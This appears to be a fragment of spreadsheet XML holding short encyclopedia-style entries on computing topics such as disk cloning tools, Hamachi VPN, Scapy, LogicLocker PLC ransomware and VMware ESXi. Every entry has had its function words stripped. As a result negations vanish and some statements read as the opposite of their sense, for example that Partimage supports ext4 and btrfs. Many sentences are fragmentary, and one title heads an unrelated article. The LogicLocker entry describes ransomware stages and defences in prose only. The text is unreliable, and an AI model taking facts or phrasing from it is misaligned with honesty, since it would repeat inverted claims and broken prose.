    <t>partimage disk cloning utility linux/unix environments. partimage save partitions many formats disk image. utilities partimage useful number situations commonly encountered network administrators well advanced computer users maintain systems. last stable release 2010; since then, partimage's authors worked fsarchiver, broader functionality partimage. common uses some common uses partimage follows. backup individual disk partitions. volume backups useful recovery case disk failure data corruption. large-scale operating system deployment. organizations multiple, similar computer systems partimage similar utilities ease process operating system software provisioning. features windows users, partimage includes experimental support ntfs. partimage supports common linux file systems, found many linux distributions, including debian live distros ping, knoppix systemrescuecd.other notable features include compression disk image files, support backup/restore network file server data encryption. partimage uses newt gui. partimage limited cloning partitions supported filesystem types. this includes ext2, ext3, reiserfs, fat12, fat16, fat16b, fat32, hpfs, jfs, xfs, ufs, ntfs. partimage support ext4 btrfs also list disk cloning software references external links official website</t>
  </si>
  <si>
    <t>LogMeIn Hamachi</t>
  </si>
  <si>
    <t>logmein hamachi virtual private network (vpn) application developed released 2004 alex pankratov. capable establishing direct links computers behind network address translation ("nat") firewalls without requiring reconfiguration (when user's accessed directly without relays internet/wan side); words, establishes connection internet emulates connection would exist computers connected local area network ("lan"). hamachi acquired pankratov logmein 2009. currently available production version microsoft windows macos, beta version linux, system-vpn-based client compatible android ios. paid subscribers hamachi runs background idle computers. feature previously available users became restricted paid subscribers only. operational summary hamachi proprietary centrally-managed system, consisting server cluster managed vendor system client software, installed end-user devices. client software adds virtual network interface computer, used intercepting outbound well injecting inbound traffic. outbound traffic sent operating system interface delivered client software, encrypts authenticates sends destination peer specially initiated connection. hamachi currently handles tunneling traffic including broadcasts multicast. windows version also recognizes tunnels traffic. each client establishes maintains control connection server cluster. when connection established, client goes login sequence, followed discovery process state synchronization. login step authenticates client server vice versa. discovery used determine topology client's internet connection, specifically detect presence firewall devices route internet. synchronization step brings client's view private networks sync members networks. when member network goes online offline, server instructs network peers either establish tear tunnels former. when establishing tunnels peers, hamachi uses server-assisted traversal technique, similar hole punching. detailed information works made public. this process work certain combinations devices, requiring user explicitly port forward. additionally series client software capable relaying traffic vendor-maintained 'relay servers'. event unexpectedly losing connection server, client retains tunnels starts actively checking status. when server unexpectedly loses client's connection, informs client's peers fact expects also start liveliness checks. this enables hamachi tunnels withstand transient network problems route client server well short periods complete server unavailability. some hamachi clients also closed port clients, cannot repaired port forwarding. hamachi frequently used gaming remote administration. vendor provides free basic service, extra features fee. february 2007, ip-level block imposed hamachi servers parts vietnamese internet space "the scale system abuse originating blocked addresses". company working less intrusive solution problem. addressing each hamachi client normally assigned address logs system first time. avoid conflicting existing private networks client side normal private address blocks 10.0.0.0/8, 172.16.0.0/12 192.168.0.0/16 used. before november 2012 5.0.0.0/8 range used. this range previously un-allocated allocated ripe late 2010 space range used hosting providers public internet. hamachi switched 25.0.0.0/8 block.the 25.0.0.0/8 block allocated british ministry defence. organizations need communicate experience problems specific internet routes attract traffic meant internal hosts, alternatively find unable reach legitimate users addresses addresses used internally, "squatting" established practice internet. client supports ipv6, selected address assigned picked range registered logmein.the address assigned hamachi client henceforth associated client's public crypto key. long client retains key, system address. hamachi creates single broadcast domain clients. this makes possible protocols rely broadcasts discovery announcement services hamachi networks. security following considerations apply hamachi's application: additional risk disclosure sensitive data stored logged mediation server minimal data forwarded. security risks vulnerable services remote machines otherwise accessible behind firewall, common vpns. hamachi stated strong, industry-standard algorithms secure authenticate data security architecture open. despite this, security cannot necessarily guaranteed. existing client-server protocol documentation contains number errors, confirmed vendor, pending correction, others confirmed. product work, "mediation server", operated vendor, required. this server stores nickname, maintenance password, statically-allocated 25.0.0.0/8 address associated authentication token user. such, potentially actual addresses users well various details session. compatibility current builds hamachi available following operating systems: microsoft windows (windows later) macos (mac 10.6 newer, x86, powerpc apple silicon (arm).) linux (officially supported ubuntu 16.04 centos x86/x64, beta armel/armhf versions available) note: stability issues ubuntu 20.04 lts. freebsd users install utilize linux version, there's port created freebsd ports. (via system vpn) android (via android system vpn)prior versions 1.0.2.0 1.0.2.1 windows release, many windows vista users experienced compatibility connection issues using hamachi. march 2007, software includes vista tweaks, answer os-related problems, among specific solutions. also network address translation (nat) overview, related rfcs: 4008, 3022, 1631 (obsolete) pertino simple traversal nats (stun), traversal protocol defined 3489 (obsoleted 5389) session traversal utilities (updated stun, defined 5389) hole punching another traversal technique virtual private service xlink references external links official website</t>
  </si>
  <si>
    <t>Parted Magic</t>
  </si>
  <si>
    <t>parted magic commercial linux distribution based slackware comes disk partitioning data recovery tools. sold linux-based bootable disk. distribution's nomenclature derived names parted partitionmagic software packages. features program directly bootable flash drive, network using hardware, require installation, presence installed operating system.although originally designed mechanical hard disk drives, parted magic suitable also solid state drives perform secure erase method built hard drive controller return drive factory state). parted magic supports reading writing variety modern file systems, including ext3, ext4, fat, exfat, ntfs, able access disk drives formatted microsoft windows linux systems. software distribution includes networking support, comes firefox browser. system requirements version 11.11.11, parted magic supports x86-64 processors natively (intel processors previously supported), requires computer least 64-bit intel-compatible processor ram. secure boot also supported. versions 2013_09_26 require physical address extension (pae) computer processor feature."changelog". retrieved january 2022. versions starting 2020_08_23 longer support 32-bit systems. availability version 2013.08.01 distribution freely available download official website project page sourceforge. distribution moved pay-for-download business model, despite packaged software free open source. also systemrescue completely libre free-to-download live cd/usb system rescue disc gparted partition editor included parted magic disk partitioning list disk partitioning software references external links parted magic internet archive</t>
  </si>
  <si>
    <t>Scapy</t>
  </si>
  <si>
    <t>scapy packet manipulation tool computer networks, originally written python philippe biondi. forge decode packets, send wire, capture them, match requests replies. also handle tasks like scanning, tracerouting, probing, unit tests, attacks, network discovery. scapy provides python interface libpcap native sockets, similar wireshark provides view capture gui. differs supporting packet injection, custom packet formats scripting. while command-line tool, still interface number programs provide visualisation including wireshark, gnuplot providing graphs, graphviz vpython interactive displaying, etc. starting 2.4.0, scapy supports python 3.4+. must confused "scapy3k" (now renamed kamene), outdated independent unmaintained fork. references external links official website scapy github</t>
  </si>
  <si>
    <t>Logic error</t>
  </si>
  <si>
    <t>Low-speed pre-ignition</t>
  </si>
  <si>
    <t>low-speed pre-ignition (lspi), also known stochastic pre-ignition (spi), pre-ignition event occurs gasoline vehicle engines premature ignition main fuel charge. lspi common certain turbocharged direct-injection vehicles operating low-speed high-load driving conditions.lspi events random infrequent, effects impacted vehicles include high-pressure spikes, loud knocking noises sometimes catastrophic engine damage. it's commonly known "detonation knock". engine management systems overcome ignition means knock detonation sensor. sensor detect ignition retard engines timing protect engine damage. desired engine behaviour occur loss performance power. issue mainly affects u.s. market fuel varying quality. r.o.n. (research octane number) lower petroleum distilate (gasoline/petrol) u.k. impact engine design automakers engine downsizing help improve vehicles’ fuel efficiency reduce emissions, turbocharger technology recover power lost downsizing process. presence lspi limits automakers’ ability capture full potential turbocharged engines meet increasing fuel-efficiency requirements reduce carbon dioxide emissions.updated oil-performance standards taking shape address lspi. general motors’ next-generation dexos1 specification, scheduled release 2015, include engine test based 2.0-liter four-cylinder ecotec test lspi. proposed ilsac gf-6 standard also include test oil-related lspi events gasoline direct-injection engines based ford four-cylinder ecoboost engine. potential solutions researchers unable pinpoint single root cause lspi instances. however, tests involving engine oils shown engine oils formulated prevent lspi maintaining oil’s basic performances.the southwest research institute (swri) launched two-year preignition prevention program (p3) consortium 2011 aimed understanding source lspi working towards developing standardized test lubes fuels. consortium's objectives included examining interaction fuel lspi events, understanding hardware design could used help mitigate lspi, identifying fluids help reduce lspi occurrences.the additive industry also looking using engine additives suppress lspi retaining fuel-saving benefits existing engine technologies. references further reading hirano, satoshi; yamashita, minoru; fujimoto, kosuke; kato, katsuyoshi (2013). "investigation engine effect abnormal combustion turbocharged direct injection spark ignition engines (part 2)". technical paper series. technical paper series. vol. doi:10.4271/2013-01-2569. external links low-speed pre-ignition (lspi) "super-knock" southwest research institute pre-ignition prevention program obama administration finalizes historic 54.5 fuel efficiency standards archived 2012-08-30 wayback machine</t>
  </si>
  <si>
    <t>LogicLocker</t>
  </si>
  <si>
    <t>logiclocker, cross-vendor ransomware worm targets programmable logic controllers (plcs) used industrial control systems (ics). first described research paper released georgia institute technology, malware capable hijacking multiple plcs various popular vendors. researchers, using water treatment plant model, able demonstrate ability display false readings, shut valves modify chlorine release poisonous levels using schneider modicon m241, schneider modicon m221 allen bradley micrologix 1400 plc. ransomware designed bypass weak authentication mechanisms found various plcs lock legitimate users planting logicbomb plc. february 2017, noted 1,400 plcs used proof-of-concept attack accessible internet found using shodan. attack method attack method used logiclocker employs five stages. initial infection, horizontal vertical movement, locking, encryption negotiation. initial infection take place various vulnerability exploits. devices typically always state, gives cyber-criminals ample time attempt compromise plc. plcs generally strong authentication mechanisms place assist protecting potential attack. initial infection could take place users clicking potentially malicious email attachment. upon initial infection plc, horizontal vertical movement achieved corporate network depending capabilities plc. next stage attack locking attacker locks legitimate users inhibit prevent restoration efforts. this done password changes, locking, over-utilization resources changing ip/ports. these different locking methods offer varying degrees success strengths. ensure successful attack encryption employed follow traditional cryptoransomware practices future negotiations. lastly, negotiations conducted attacker victim service restoration. some plcs contain email capability used send ransom message case micrologix 1400 used proof-of-concept attack. defense strategies assist defense vulnerability mitigation efforts several strategies employed. endpoint security endpoint security techniques password changes, disabling unused ports protocols implementation access control lists (acl), maintaining proper backups firmware updates used. this significantly reduce attack surface presented cyber-criminals. network security increased vigilant network monitoring used detect abnormalities. protocol whitelisting firewalls, network segmentation automated backups provide additional security provide decreased restoration time provided backups compromised attack. policy training employees properly identify phishing emails, prohibition devices incorporating comprehensive incident response plan used assist countering threat. also control attack stuxnet references</t>
  </si>
  <si>
    <t>Login manager</t>
  </si>
  <si>
    <t>login manager login system unix unix-like operating systems. comprises login daemon, login user interface, system tracking login sessions. when user tries login manager passes user's credentials authentication system. since display manager graphical user interface login, people terms display manager login manager synonymously.systemd, init daemon linux, integrated login manager; login daemon called logind. systemd's login manager alternative consolekit. also authentication name service switch passwd pluggable authentication module references</t>
  </si>
  <si>
    <t>Sawmill (software)</t>
  </si>
  <si>
    <t>sawmill software package statistical analysis reporting files, dynamic contextual filtering, "live" data zooming, user interface customization, custom calculated reports. sawmill also incorporates real-time reporting real-time alerting. available since 1997, time sawmill provides support approximately server file formats, formats added request. sawmill also includes page tagging server javascript page analysis client side clicks (client requests) providing total view visitor traffic on-site behavioural activity. sawmill analytics offered three forms, software package user deployment, turnkey on-premises system appliance, saas. sawmill analyzes device software package producing file includes servers, firewalls, proxy servers, mail servers, network devices (switches routers etc.), syslog servers, databases etc. sawmill reporting engine sold blue coat systems bundled part proxy server product. branded version also sold cisco systems sawmill ironport. branded version also sold vicomsoft intergate intelligence. branded version also sold sonicwall "sonicwall aventail advanced reporting".sawmill second runner-up 2009 streaming media european readers' choice awards.sawmill listed ideal observer's analytics tool overview. also analysis list analytics software sawzall (programming language) references external links http://www.sawmill.net, universal analysis reporting. http://www.sawmill.co.uk, distribution, training, sales support emea region. comparison analytics software awstats documentation magazine review sawmill 2001, retrieved 2009-11-27 tiscali review sawmill information management magazine, september 2008. retrieved 2009-12-03.</t>
  </si>
  <si>
    <t>Long-term support</t>
  </si>
  <si>
    <t>long-term support (lts) product lifecycle management policy stable release computer software maintained longer period time standard edition. term typically reserved open-source software, describes software edition supported months years longer software's standard edition. short term support (sts) term distinguishes support policy software's standard edition. software comparatively short life cycle, afforded features omitted edition avoid potentially compromising stability compatibility release. characteristics applies tenets reliability engineering software development process software release life cycle. long-term support extends period software maintenance; also alters type frequency software updates (patches) reduce risk, expense, disruption software deployment, promoting dependability software. necessarily imply technical support. beginning long-term support period, software developers impose feature freeze: they make patches correct software bugs vulnerabilities, introduce features cause regression. software maintainer either distributes patches individually, packages maintenance releases, point releases, service packs. conclusion support period, product either reaches end-of-life, receives reduced level support period time (e.g., high-priority security patches only). rationale before upgrading software, decision-maker might consider risk cost upgrade.as software developers features software bugs, introduce bugs break functionality. when flaw occurs software, called regression. ways software publisher maintainer reduce risk regression release major updates less frequently, allow users test alternate, updated version software. software applies risk-reduction strategies. edition software published parallel (short-term support) edition. since major updates edition published frequently, offers users preview changes might incorporated edition changes judged sufficient quality. while using older versions software avoid risks associated upgrading, introduce risk losing support software. long-term support addresses assuring users administrators software maintained specific period time, updates selected publication carry significantly reduced risk regression. maintainers software publish updates either risk reduce risk (such security patches). patches software published understanding installing less risky installing them. software separate versions this table lists specific version addition normal release cycle. many projects, centos, provide long period support every release. support period ubuntu's parent distribution, debian, year release next stable version. since debian "squeeze", support (bug fixes security patches) added version releases. total support time generally around years every version. irregular release cycle debian, support times might vary average support done debian team separate group volunteers. also references further reading arnuphaptrairong, tharwon (2011). "top lists software project risks: evidence literature survey" (pdf). proceedings international multiconference engineers computer scientists 2011. isbn 978-988-18210-3-4. issn 2078-0966. retrieved august 2013. "what makes software dependable?". bcs.org. bcs. february 2007. retrieved august 2013. brenner, bill. "outdated software risky business". search security. techtarget. retrieved august 2013. "deploying software: principles ensure frequent, low-risk deployments". government service design manual. government digital service. retrieved august 2013. graydon, patrick knight, john xiang (2010). "practical limits software dependability: case study" (pdf). retrieved august 2013. humble, february 2012). "four principles low-risk software releases". informit. pearson education. retrieved august 2013. littlewood, bev; strigini, lorenzo. "software reliability dependability: roadmap" (pdf). retrieved august 2013. weiss, aaron june 2012). "the hidden security risks legacy software". esecurity planet. retrieved august 2013. ghosh, shona december 2013). "windows microsoft's ticking time bomb". pro. dennis publishing. retrieved january 2014.</t>
  </si>
  <si>
    <t>LongHaul</t>
  </si>
  <si>
    <t>longhaul speed throttling power saving technology developed technologies. executing specialized instructions, software exercise fine control bus-to-core frequency ratio core voltage. when system first boots, ratio voltage hardware defaults. while operating system runs, driver controls throttling according much load cpu. this fine control cpu's operating parameters brings longhaul contrast competing technologies, typically allowed switch states fast power-consuming slow uses less power. however longhaul considered similar transmeta's longrun technology. there versions longhaul: version supports dynamic frequency scaling implemented cyrix samuel (c5a) core samuel (c5b) stepping core. version adds voltage scaling implemented samuel (c5b) stepping ezra (c5c) cores. version renamed powersaver implemented ezra-t (c5n) nehemiah cores well esther (c5j) core. some variants c7-d support powersaver. processors supporting longhaul cyrix models (powersaver) nano (powersaver) external links ebga datasheet tom's computer dictionary longhaul entry</t>
  </si>
  <si>
    <t>LongRun</t>
  </si>
  <si>
    <t>longrun longrun2 power management technologies introduced transmeta. longrun introduced crusoe processor, longrun2 introduced efficeon processor. longrun2 since licensed fujitsu, nec, sony, toshiba, nvidia.longrun automatically adjusted processor, moving higher performance higher power, lower power lower performance. goals automation could adjusted. control offered processor frequency levels, ability minimum maximum "window", automatic controls would adjust speed outside window. second control offered target either "economy" "performance". some versions offered third control adjusted processor based power rather speed.longrun based primarily reducing clock frequency voltage supplied processor, commonly called dvfs. lower frequency reduces performance also allows voltage reduction, yield power savings improved efficiency. longrun2 built incorporating process technology aimed reducing variations manufacturing process thereby improving yields. references external links official description longrun2, recovered internet archive 2009.</t>
  </si>
  <si>
    <t>Longitudinal redundancy check</t>
  </si>
  <si>
    <t>telecommunication, longitudinal redundancy check (lrc), horizontal redundancy check, form redundancy check applied independently parallel group streams. data must divided transmission blocks, additional check data added. term usually applies single parity stream, calculated independently streams (bip-8), although could also used refer larger hamming code.this "extra" word block data similar checksum cyclic redundancy check (crc). optimal rectangular code while simple longitudinal parity detect errors, combined additional error-control coding, transverse redundancy check (trc), correct errors. transverse redundancy check stored dedicated "parity track". whenever single-bit error occurs transmission block data, two-dimensional parity checking, "two-coordinate parity checking", enables receiver detect byte error occurred detect exactly track error occurred discover exactly error, correct flipping pseudocode international standard 1155 states longitudinal redundancy check sequence bytes computed software following algorithm: byte buffer (lrc 0xff (((lrc 0xff) 0xff) expressed "the 8-bit two's-complement value bytes modulo 0xff equivalent 28). other forms many protocols xor-based longitudinal redundancy check byte (often called block check character bcc), including serial line interface protocol (slip, confused later well-known serial line internet protocol), 62056-21 standard electrical-meter reading, smart cards defined iso/iec 7816, access.bus protocol. 8-bit equivalent cyclic redundancy check using polynomial independence streams less clear looked way. references this article incorporates public domain material general services administration document: "federal standard 1037c". support mil-std-188)</t>
  </si>
  <si>
    <t>Lorcon</t>
  </si>
  <si>
    <t>lorcon (acronym loss radio connectivity) open source network tool. library injecting 802.11 (wlan) frames, capable injecting multiple driver frameworks, without need change application code. lorcon built patching third-party madwifi-driver cards based qualcomm atheros wireless chipset.the project maintained joshua wright michael kershaw ("dragorn"). references external links official home page pylorcon2 github</t>
  </si>
  <si>
    <t>Logical partition</t>
  </si>
  <si>
    <t>logical partition (lpar) subset computer's hardware resources, virtualized separate computer. effect, physical machine partitioned multiple logical partitions, hosting separate instance operating system. history developed concept hypervisors (virtual machines cp-40 cp-67) 1972 provided s/370 virtual machine facility/370. introduced start interpretive execution (sie) instruction (designed specifically execution virtual machines) part 370-xa architecture 3081, well vm/xa versions exploit pr/sm type-1 hypervisor based component vm/xa runs directly machine level allocates system resources across lpars share physical resources. standard feature system only. power system uses phyp (the power hypervisor) enable lpar functionalities system system since approximately 2000 power4 systems. terms pr/sm lpar often used interchangeably including documentation. formally, lpar designates logical partitioning function mode operation, whereas pr/sm commercial designation feature.: amdahl corporation's multiple domain facility (mdf) introduced 1982. began marketing functionally similar pr/sm 1988, implemented esa/390 architecture released year. mdf-based lpar technology continued developed separately amdahl, hitachi data systems part implementations architecture, featured introduction access registers allowed multiple data spaces addressable single address space. subsequently continued lpar development 64-bit system as/400 architectures. lpar pr/sm reconfigurations made without rebooting computer, i.e., lpars remain active. reconfigurations include changing channel path definitions device definitions. z/vm supports z/architecture hipersockets function high-speed tcp/ip communication among virtual machines logical partitions (lpars) within zseries server. this function uses adaptation queued-direct input/output (qdio) high-speed protocol. later introduced lpars iseries pseries servers 1999 2001, respectively, albeit varying technical specifications. multiple operating systems compatible lpars, including z/os, z/vm, z/vse, z/tpf, aix, linux, storage systems, totalstorage ds8000, lpars allow multiple virtual instances storage array exist within single physical array. first part 2010 year, fujitsu announced availability x86-64 primequest line servers, support lpars. second part 2011 year, hitachi announced availability cb2000 cb320 blade systems, support lpar x86-64 hardware. hardware partitioning logical partitioning divides hardware resources. lpars access memory common memory chip, provided ranges addresses directly accessible overlap. possible partition control memory managed second partition indirectly communicating process partition direct access, acts intermediary. cpus dedicated single lpar shared. while amdahl's (multiple domain facility) possible configure lpar shared dedicated cpus, longer possible mainframes currently market. mainframes, lpars managed pr/sm facility related, optional, simplified facility called dynamic partition manager (dpm). 64-bit mainframes, except first generation 64-bit models (z900 z800), operate exclusively lpar mode, even partition machine. multiple lpars running z/os form sysplex parallel sysplex, whether machine spread across multiple machines.on system power hardware, lpars managed phyp (the power hypervisor). phyp acts virtual switch lpars also handles virtual scsi traffic lpars. micro-partitioning supports times many lpars processors fractional allocations. introduced power5 processor. power5, power6, successor systems partitioned. note full system partition defined resources consumed single partition. system servers powervm enabled allow lpars shared cpus delegate unused cycles shared pool. dedicated processors available sharing. unused cycles become available partitions governed parameters specified lpar defined. changes running partition made dynamically maximum value set, minimum value active profile. changing resource allocations without restart logical partition called dynamic logical partitioning. powervm licensed/purchased feature enables virtualization features subsequent series servers.exploiting intel vpro (i.e. non-uniform memory access), also implementations logical partitioning based intel xeon e.g. hitachi data systems.lpars (with sufficient certification) safely allow combining multiple test, development, quality assurance, production work server, offering advantages lower costs, faster deployment, convenience. mainframe lpars common criteria certifiable, equivalent physically unconnected servers, support highest security requirements, including military use. nearly mainframes multiple lpars system system supporting lpars later models also (operating system) full virtualization dynamic logical partitioning (dlpar) workload partitions (wpar) hipersocket, hypervisor virtualization powervm solaris containers ldom references external links security mainframe, december 2009, karan singh, chapter virtualization, page page system system logical partitioning guide system virtualization complete virtualization offering unix linux hitachi compute blade lpars fujitsu xpars (sparc) "flexible partitioning" (x86_64)</t>
  </si>
  <si>
    <t>MAC filtering</t>
  </si>
  <si>
    <t>computer networking, filtering refers security access control method whereby address assigned network card used determine access network. addresses uniquely assigned card, using filtering network permits denies network access specific devices blacklists whitelists. while restriction network access lists straightforward, individual person identified address, rather device only, authorized person need whitelist entry device would like access network. while giving network additional protection, filtering circumvented using packet analyzer find valid using spoofing access network using address. address filtering considered security obscurity effectiveness based "the secrecy implementation components". port security many devices support filtering device basis. whitelisted addresses allowed port device blacklisted addresses blocked ports. other devices, cisco catalyst switches, support filtering port-by-port basis. this referred port security. port security configured statically list, dynamically based first given number addresses detected, combination methods. when port security configured, default settings allow address port, shut port allowed number addresses exceeded. also access-control list address blocking private vlan references external links</t>
  </si>
  <si>
    <t>Qrpff</t>
  </si>
  <si>
    <t>qrpff perl script created keith winstein marc horowitz sipb. performs decss seven lines. name encoding "decss" rot-13. algorithm rewritten times condense lines.in fact, versions qrpff exist: short version lines) fast version lines). both appear below. short: fast: fast version actually fast enough decode movie real-time. qrpff related memorabilia sold $2,500 algorithm auction, world's first auction computer algorithms. references external links qrpff (fast) explained gallery descramblers</t>
  </si>
  <si>
    <t>List of ammonium nitrate disasters</t>
  </si>
  <si>
    <t>when heated, ammonium nitrate decomposes non-explosively gases oxygen, nitrogen, water vapor; however, induced decompose explosively detonation nitrous oxide water vapor. large stockpiles material major fire risk supporting oxidation, also detonate, happened texas city disaster 1947 major changes regulations storage handling. there major classes incidents resulting explosions: first case, explosion happens mechanism shock detonation transition. initiation happens explosive charge going mass, detonation shell thrown mass, detonation explosive mixture contact mass. examples kriewald, morgan, oppau, tessenderlo, traskwood. second case, explosion results fire spreads ammonium nitrate (an) (texas city, brest, tianjin, beirut) mixture ammonium nitrate combustible material fire. fire must confined least degree successful transition fire explosion phenomenon known "deflagration detonation transition", ddt). pure, compact stable difficult initiate. however, numerous cases even impure explode fire.ammonium nitrate decomposes temperatures (410 °f). pure stable stop decomposing heat source removed, catalysts present, reaction become self-sustaining (known self-sustaining decomposition, ssd). this well-known hazard types fertilizers responsible loss several cargo ships. timeline major disasters column states amount ammonium nitrate consumed disaster metric tonnes. also ammonium nitrate bomb largest artificial non-nuclear explosions, many involved ammonium nitrate references</t>
  </si>
  <si>
    <t>Purple Penelope</t>
  </si>
  <si>
    <t>purple penelope demonstration secure system created defence research agency (dra) show security functionality windows could extended support users handling classified information. security model purple penelope implemented domain based security model developed ministry defence take advantage using commercial shelf (cots) software implement secure systems. within security domain access controls designed stop users accessing material without need-to-know prevent making mistakes handling classified data, controls sharing information security domains stringent defend attacks hold users account actions. model calls discretionary security labelling role based access controls within domain user-sanctioned release information domain coupled application oriented accounting audit. security functionality purple penelope extended windows microsoft office application suite. main features system discretionary labelling trusted path authorising security critical actions. discretionary labelling mechanism added security labels files, application windows clipboard. user's desktop display augmented stripe across screen. this showed security label application window focus security label clipboard. when data copied clipboard clipboard label source application window. when data copied clipboard destination application window's label "floated label data. user free change label window clipboard time. user's also access shared file store. files shared file store labelled opened application application's window label file. shared file store could written directly application. user able copy files shared file store required confirm action using trusted path interface inaccessible applications. legacy software created purple penelope project licensed argus systems developed product called deep purple.the software also laid foundation qinetiq's sybard suite product.the work cross-domain guard production dera's swipsy firewall toolkit. name purple derived colour associated joint operations time.penelope name wife odysseus tricked suitors weaving burial shroud unpicking night. this slow progress thought reflect state secure system development time. references</t>
  </si>
  <si>
    <t>Purple Screen of Death</t>
  </si>
  <si>
    <t>vmware esxi (formerly esx) enterprise-class, type-1 hypervisor developed vmware deploying serving virtual computers. type-1 hypervisor, esxi software application installed operating system (os); instead, includes integrates vital components, kernel.after version (released 2010), vmware renamed esxi. esxi replaces service console rudimentary operating system) closely integrated esx/esxi primary component vmware infrastructure software suite.the name originated abbreviation elastic september 2004, replacement internally called vmvisor, later changed esxi esxi stood "integrated"). architecture runs bare metal (without running operating system) unlike vmware products. includes kernel. historic vmware esx, linux kernel started first used load variety specialized virtualization components, including esx, otherwise known vmkernel component. linux kernel primary virtual machine; invoked service console. normal run-time, vmkernel running bare computer, linux-based service console first virtual machine. vmware dropped development version 4.1, uses esxi, include linux kernel all.the vmkernel microkernel three interfaces: hardware, guest systems, service console (console os). interface hardware vmkernel handles memory directly, using scan-before-execution (sbe) handle special privileged instructions srat (system resource allocation table) track allocated memory.access hardware (such network storage devices) takes place using modules. least modules derive modules used linux kernel. access modules, additional module called vmklinux implements linux module interface. according readme file, "this module contains linux emulation layer used vmkernel."the vmkernel uses device drivers: net/e100 net/e1000 net/e1000e net/bnx2 net/tg3 net/forcedeth net/pcnet32 block/cciss scsi/adp94xx scsi/aic7xxx scsi/aic79xx scsi/ips scsi/lpfcdd-v732 scsi/megaraid2 scsi/mptscsi_2xx scsi/qla2200-v7.07 scsi/megaraid_sas scsi/qla4010 scsi/qla4022 scsi/vmkiscsi scsi/aacraid_esx30 scsi/lpfcdd-v7xx scsi/qla2200-v7xxthese drivers mostly equate described vmware's hardware compatibility list. modules fall gpl. programmers adapted vmkernel: vmware inc. changed module-loading minor things. service console (and esxi), service console vestigial general purpose operating system significantly used bootstrap vmware kernel, vmkernel, secondarily used management interface. both console operating system functions deprecated version 5.0, vmware migrates exclusively esxi model. service console, intents purposes, operating system used interact vmware virtual machines server. purple screen death event hardware error, vmkernel catch machine check exception. this results error message displayed purple diagnostic screen. this colloquially known purple diagnostic screen, purple screen death (psod, blue screen death (bsod)). upon displaying purple diagnostic screen, vmkernel writes debug information core dump partition. this information, together error codes displayed purple diagnostic screen used vmware support determine cause problem. versions vmware available main types: esxi, although since version esxi continued. esxi version support windows 8/windows 2012. these microsoft operating systems esxi later.vmware esxi, smaller-footprint version esx, include service console. available without need purchase vcenter license free download vmware, features disabled.esxi stands "esx integrated".vmware esxi originated compact version vmware allowed smaller disk footprint host. with simple configuration console mostly network configuration remote based vmware infrastructure client interface, allows resources dedicated guest environments. variations esxi exist: vmware esxi installable vmware esxi embedded editionthe media used install either variations depending size target media. upgrade esxi vmware infrastructure vmware vsphere esxi. originally named vmware server esxi edition, several revisions esxi product finally became vmware esxi editions followed: esxi 3.5, esxi esxi 2015) esxi violation lawsuit vmware sued christoph hellwig, linux kernel developer. lawsuit began march 2015. alleged vmware misappropriated portions linux kernel, and, following dismissal court 2016, hellwig announced would file appeal.the appeal decided february 2019 dismissed german court, basis meeting "procedural requirements burden proof plaintiff".in last stage lawsuit march 2019, hamburg higher regional court also rejected claim procedural grounds. following this, vmware officially announced would remove code question. this followed hellwig withdrawing case, withholding legal action. related additional products following products operate conjunction esx: vcenter server, enables monitoring management multiple esx, esxi servers. addition, users must install infrastructure services vmotion (transferring virtual machines servers whilst running, zero downtime) svmotion storage vmotion (transferring virtual machines shared storage luns fly, zero downtime) enhanced vmotion evmotion simultaneous vmotion svmotion, supported version above) distributed resource scheduler (drs) (automated vmotion based host/vm load requirements/demands) high availability (ha) (restarting virtual machine guest operating systems event physical host failure) fault tolerance (ft) (almost instant stateful fail-over event physical host failure) converter, enables users create vmware server- workstation-compatible virtual machines either physical machines virtual machines made virtualization products. converter replaces vmware "p2v assistant" "importer" products assistant allowed users convert physical machines virtual machines, importer allowed import virtual machines products vmware workstation. vsphere client (formerly vmware infrastructure client), enables monitoring management single instance esxi server. after 4.1, vsphere client longer available esx/esxi server must downloaded vmware site. cisco nexus 1000v network-connectivity hosts running relies virtual nics (inside virtual switches. latter exists versions: 'standard' vswitch allowing several single host share physical 'distributed vswitch' vswitches different hosts together form logical switch. cisco offers cisco nexus product-line nexus 1000v, advanced version standard distributed vswitch. nexus 1000v consists parts: supervisor module (vsm) host virtual ethernet module (vem). runs virtual appliance within cluster dedicated hardware (nexus 1010 series) runs module host replaces standard (distributed virtual switch) vmware. configuration switch done using standard nx-os cli. offers capabilities create standard port-profiles assigned virtual machines using vcenter. there several differences standard n1000v; cisco switch generally full support network technologies lacp link aggregation vmware switch supports features routing based physical load. however, main difference lies architecture: nexus 1000v working physical ethernet switch relying information esx. this consequences example scalability kappa limit n1000v 2048 virtual ports 60000 dvs. nexus1000v developed co-operation cisco vmware uses dvs. third-party management tools because vmware leader server-virtualization market, software hardware vendors offer range tools integrate products services esx. examples products veeam software backup management applications plugin monitor manage using openview, quest software range management backup-applications major backup-solution providers plugins modules esx. using microsoft operations manager (scom) 2007/2012 bridgeways management pack gives user realtime datacenter health view. hardware vendors hewlett-packard dell include tools support esx(i) hardware platforms. example module dell's openmanage management platform.vmware added client since work vcenter contain features. veman linux application trying fill gap. these examples: numerous party products manage, monitor backup infrastructures running them. known limitations known limitations vmware esxi september 2020, include following: infrastructure limitations some maximums esxi server influence design data centers: guest system maximum ram: host system maximum ram: number hosts high availability distributed resource scheduler cluster: maximum number processors virtual machine: maximum number processors host: maximum number virtual cpus physical core: maximum number virtual machines host: 1024 maximum number virtual cpus fault tolerant virtual machine: maximum guest system fault tolerant virtual machine: vmfs5 maximum volume size: maximum file size -512 bytes maximum video memory virtual machine: performance limitations terms performance, virtualization imposes cost additional work perform virtualize underlying hardware. instructions perform extra work, activities require virtualization, tend operating system calls. unmodified operating system, calls introduce greatest portion virtualization "overhead".paravirtualization virtualization techniques help issues. vmware developed virtual machine interface purpose, selected operating systems currently support this. comparison full virtualization paravirtualization server shows cases paravirtualization much faster. network limitations when using advanced extended network capabilities using cisco nexus 1000v distributed virtual switch following network-related limitations apply: esx/esxi hosts (virtual supervisor module) 2048 virtual ethernet interfaces vmware (virtual distributed switch)and maximum virtual interfaces esx/esxi host2048 active vlans (one used communication vems vsm) 2048 port-profiles physical nics esx/esxi (physical) host port-channels vmware (virtual distributed switch)and maximum port-channels esx/esxi host fibre channel fabric limitations regardless type virtual scsi adapter used, limitations: maximum virtual scsi adapters, dedicated virtual disk maximum scsi luns adapter also comparison platform virtualization software linux kernel-based virtual machine open-source hypervisor platform hyper-v competitor vmware microsoft open-source hypervisor platform virtual appliance virtual machine virtual disk image vmware vmfs virtualization compatible motherboards references external links vmware product page esxi release build number history vmware esxi image servers</t>
  </si>
  <si>
    <t>Lguest</t>
  </si>
  <si>
